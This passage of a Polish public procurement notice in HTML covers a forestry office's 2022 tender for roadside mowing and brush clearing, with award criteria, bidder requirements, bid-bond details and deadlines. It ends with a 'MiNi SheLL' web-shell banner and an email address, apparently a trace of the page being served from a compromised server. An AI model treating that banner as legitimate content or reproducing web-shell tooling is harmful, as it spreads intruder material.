class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykaszanie oraz wycięcie zakrzaczeń (prace mechaniczne) , o grubości do. 5 cm w ilości<br/>nie przekraczającej 1 szt na m2, na poboczach i skaprach przy drogach leśnych (obustronnie)<br/>na łącznej długości dróg ok. 23,28 km, w tym wykaszanie i wycięcie zakrzaczeń ( z przewagą<br/>prac ręcznych średnio ok. 40%), o grubości pow. 5 cm w skupiskach pow 5 szt na m2, na<br/>przeciwskarpach rowów przy drogach leśnych (obustronnie) oraz na szerokość około 0,5 m<br/>za skarpą od strony ściany lasu na łącznej długości dróg ok. 10,59 km. Złożenie pozyskanego<br/>materiału w pryzmach na miejsce wskazane przez leśniczego na odległość do 100 m, lub<br/>odrzucenie do lasu w porozumieniu z miejscowym leśniczym. Obkoszenie rogatek i barierek<br/>przy drogach. Wykonawca jest zobowiązany do używania jedynie takiego sprzętu, który nie<br/>spowoduje niekorzystnego wpływu na jakość wykonywanych prac. Sprzęt do koszenia trawy<br/>i niszczenia chwastów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77312000-0 - Usługi usuwania chwastów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1. Zamawiający przewiduje udzielenie w okresie 3 lat od dnia udzielenia zamówienia<br/>podstawowego, zamówienia polegającego na powtórzeniu podobnych usług zgodnych z<br/>przedmiotem zamówienia podstawowego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy<br/>Pzp – o wartości do 40% szacunkowej wartości zamówienia podstawowego.<br/>2. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone w szczególności w<br/>przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót, stanowiących<br/>przedmiot zamówienia na skutek warunków atmosferycznych, wystąpienia robót dodatkowych i zamiennych lub powierzenia Zamawiającemu nowych zadań<br/>gospodarczych lub publicznych.<br/>3. Zamówienia, o których mowa w ust. 1, mogą zostać udzielone po przeprowadzeniu<br/>odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z<br/>wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający kierować się będzie<br/>następującymi kryteriami:<br/>– Cena – 100%<br/>2. W ramach każdego z powyższych kryteriów można otrzymać maksymalnie 100 pkt, co po<br/>przeliczeniu przez odpowiednia wagę procentową oznacza, że w kryterium „Cena” można<br/>otrzymać maksymalnie 100 pkt.<br/>3. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Ocena ofert będzie się<br/>odbywać według zasad opisanych w ust. 4 poniżej.<br/>4. Oferty będą oceniane wg następującego wzoru:<br/>1) W ramach kryterium „Cena” oceniana będzie cena łączna brutto podana w formularzu oferty.<br/>Ocena ofert w tym kryterium zostanie dokonana przy zastosowaniu poniższego wzoru:<br/>Cmin<br/>C = ------------------ x 100 pkt x 100%<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”<br/>Cmin - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>5. Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą ilość punktów<br/>wyliczoną zgodnie ze wzorem:<br/>O = C<br/>Oferta może uzyskać maksymalnie 100 punktów.<br/>6. Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>7. Suma punktów uzyskanych za kryterium ceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy<br/>zdolności w zakresie doświadczenia, tj. że: -posiadają doświadczenie, polegające na wykonaniu lub wykonywaniu (przy czym w tym<br/>przypadku będzie liczona wartość zrealizowanej części przedmiotu umowy) przynajmniej jednej<br/>usługi odpowiadającej swoim rodzajem przedmiotowi zamówienia tj.:<br/>a) zadanie częściowe nr 1 - Koszenie i wycięcie zakrzaczeń przy drogach o łącznej<br/>wartości nie mniejszej niż 43 000,00 zł brutto<br/>b) zadanie częściowe nr 2 - Koszenie i wycięcie zakrzaczeń przy drogach o łącznej<br/>wartości nie mniejszej niż 35 000,00 zł brutto<br/>c) zadanie częściowe nr 3 - Koszenie i wycięcie zakrzaczeń przy drogach o łącznej<br/>wartości nie mniejszej niż 39 000,00 zł brutto<br/>w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów<br/>określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na<br/>rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest<br/>w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń<br/>okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające<br/>ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem<br/>terminu składania ofert.<br/>2.2. W zakresie sytuacji ekonomicznej lub finansowej zostanie uznany za spełniony, jeśli<br/>Wykonawca wykaże, że:<br/>Posiada środki finansowe lub zdolność kredytową na kwotę nie niższą niż:<br/>a) zadanie częściowe nr 1 – 30 000,00 zł<br/>b) zadanie częściowe nr 2 – 18 000,00 zł<br/>c) zadanie częściowe nr 3 – 19 000,00 zł.<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w<br/>stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać<br/>na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych<br/>podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>2.3. Warunek w zakresie zdolności technicznej, zostanie uznany za spełniony, jeśli Wykonawca<br/>wykaże, że dysponuje następującym sprzętem do realizacji usługi:<br/>Dla zadania częściowego nr 1 – min. – kosiarka bijakowa na wysięgniku wraz z ciągnikiem lub<br/>Unimogiem min. 1 szt.; kosiarki ręczne żyłkowe, spalinowe lub elektryczne min. 1 szt. min. 1<br/>szt, piła spalinowa ręczna - min. 1 szt.<br/>Dla zadania częściowego nr 2 – min. – kosiarka bijakowa na wysięgniku wraz z ciągnikiem lub<br/>Unimogiem – min. 1 szt, kosiarki ręczne żyłkowe, spalinowe lub elektryczne, min. 1 szt, piła<br/>spalinowa ręczna - min. 1 szt. Dla zadania częściowego nr 3 – min. – kosiarka bijakowa na wysięgniku wraz z ciągnikiem lub<br/>Unimogiem – min. 1 szt, kosiarki ręczne żyłkowe, spalinowe lub elektryczne, min. 1 szt, piła<br/>spalinowa ręczna - min. 1 szt. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Przed upływem terminu składania ofert Wykonawca zobowiązany jest wnieść wadium<br/>w wysokości:<br/>Dla zadania częściowego nr 1: 1 700,00 zł (słownie: jeden tysiąc siedemset zł 00/100)<br/>Dla zadania częściowego nr 2: 1 400,00 zł (słownie: jeden tysiąc czterysta zł 00/100)<br/>Dla zadania częściowego nr 3: 1 600,00 zł (słownie: jeden tysiąc sześćset zł 00/100)<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, gdy zawarto umowę (art. 98<br/>ust. 1 pkt 2 ustawy Pzp) albo unieważniono postępowanie (art. 98 ust. 1 pkt 3 ustawy Pzp)<br/>oraz złożono wniosek o zwrot wadium (art. 98 ust. 2 ustawy Pzp).<br/>3. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy<br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/>(Dz.U. z 2019 r. poz. 310, 836 i 1572).<br/>4. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym<br/>przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem<br/>nowego wadium na przedłużony okres związania ofertą.<br/>5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w banku<br/>PEKAO S.A. I Oddz. W Lubaczowie nr rachunku: 93 1240 2584 1111 0000 3944 5436, z<br/>dopiskiem na przelewie: „Wadium na zabezpieczenie oferty w postępowaniu na: Usługę<br/>koszenia i wycięcia zakrzaczeń przy drogach leśnych.”<br/>6. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych<br/>na rachunku bankowym Zamawiającego przed upływem terminu składania ofert (tj. przed<br/>upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>7. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>8. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 2) Jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, podmiotu udostępniającego zasoby lub podwykonawcy niebędącego<br/>podmiotem udostępniającym zasoby, działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z powyższych dokumentów, należy złożyć<br/>pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania<br/>Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>publicznego, podmiotu udostępniającego zasoby lub podwykonawcy niebędącego<br/>podmiotem udostępniającym zasoby.<br/>Pełnomocnictwo powinno być złożone w oryginale lub w postaci cyfrowego<br/>odwzorowania dokumentu sporządzonego w postaci papierowej (elektronicznej<br/>kopii), poświadczonej za zgodność z oryginałem przez mocodawcę albo<br/>notarialnie.<br/>1. Oferty, oświadczenia o niepodleganiu wykluczeniu i spełnianiu warunków udziału<br/>w postępowaniu, podmiotowe środki dowodowe, w tym oświadczenie Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, które roboty budowlane, dostawy lub<br/>usługi wykonają poszczególni Wykonawcy oraz zobowiązanie podmiotu udostępniającego<br/>zasoby, pełnomocnictwo, sporządza się w postaci elektronicznej, w formatach danych<br/>określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r.<br/>o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz.U. z 2020 r.<br/>poz. 346, 568, 695, 1517 i 2320), z uwzględnieniem rodzaju przekazywanych danych.<br/>5. W przypadku gdy podmiotowe środki dowodowe, inne dokumenty, lub dokumenty<br/>potwierdzające umocowanie do reprezentowania odpowiednio Wykonawcy, Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia publicznego, podmiotu<br/>udostępniającego zasoby lub podwykonawcy niebędącego podmiotem udostępniającym<br/>zasoby, zostały wystawione przez podmioty inne niż Wykonawca, Wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub<br/>podwykonawca (dalej „upoważnione podmioty”), jako dokument elektroniczny,<br/>przekazuje się ten dokument.<br/>7. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej,<br/>o którym mowa w ust. 6, dokonuje w przypadku:<br/>1) podmiotowych środków dowodowych oraz dokumentów potwierdzających umocowanie<br/>do reprezentowania – odpowiednio Wykonawca, Wykonawca wspólnie ubiegający się<br/>o udzielenie zamówienia, podmiot udostępniający zasoby lub podwykonawca, w<br/>zakresie podmiotowych środków dowodowych lub dokumentów potwierdzających<br/>umocowanie do reprezentowania, które każdego z nich dotyczą;<br/>2) innych dokumentów – odpowiednio Wykonawca lub Wykonawca wspólnie ubiegający się<br/>o udzielenie zamówienia, w zakresie dokumentów, które każdego z nich dotyczą. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:<br/>1.	Zmiana terminu realizacji Przedmiotu Umowy w przypadku zaistnienia jednej lub kilku wymienionych poniżej okoliczności:<br/>1)	spowodowanych warunkami zewnętrznymi, w szczególności:<br/>a.	klęskami żywiołowymi, w tym w szczególności epidemią wirusa Sars-Cov-2, warunkami atmosferycznymi odbiegającymi od naturalnych (np. ponadprzeciętne opady deszczu lub śniegu, długotrwała susza, zjawiska nietypowe dla danej strefy klimatycznej);<br/>2)	spowodowanych warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności:<br/>a.	odnalezieniem niewypałów i niewybuchów,<br/>b.	stwierdzeniem odmiennych od przyjętych w dokumentacji projektowej warunki geologiczne (np. kategorie gruntu);<br/>3)	będących następstwem zdarzeń leżących po stronie Zamawiającego, takich jak w szczególności:<br/>a.	wstrzymaniem usług przez Zamawiającego,<br/>b.	koniecznością usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej; <br/>4)	będących następstwem działania organów administracji, w szczególności takich jak np.:<br/>a.	odmową wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej,<br/>b.	wstrzymaniem usług przez organy nadzoru;<br/>5)	stanowiących inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac takie jak np. błędy oraz niedopatrzenia powstałe w wyniku działalności człowieka, których skutki mogą doprowadzić do znacznej modyfikacji pierwotnych założeń projektu.<br/>W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1)-5) termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, stosowanie do okresu trwania tych okoliczności oraz skutków, które te okoliczności wywołały. <br/>3.	Pozostałe zmiany: <br/>1)	zmiana obowiązującej stawki VAT; Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez wykonawcę. <br/>2)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.<br/>3) konieczność wykonania usług niezbędnych dla prawidłowego i należytego wykonania przedmiotu umowy, które nie zostały przewidziane w umowie lub w dokumentacji przetargowej Usługi konieczne zostaną uznane za dodatkowe, jeżeli wykonawca lub zamawiający ujawni taką konieczność w protokole konieczności, przedstawiciel Zamawiającego potwierdzi taka konieczność. Zatwierdzony protokół konieczności przez Nadleśniczego będzie stanowił podstawę do przeprowadzenia negocjacji ceny, zgodnie z procedurą opisaną w paragrafie 1 ust. 5-10. <br/>4.	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-31 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lasy_lubaczow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-31 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com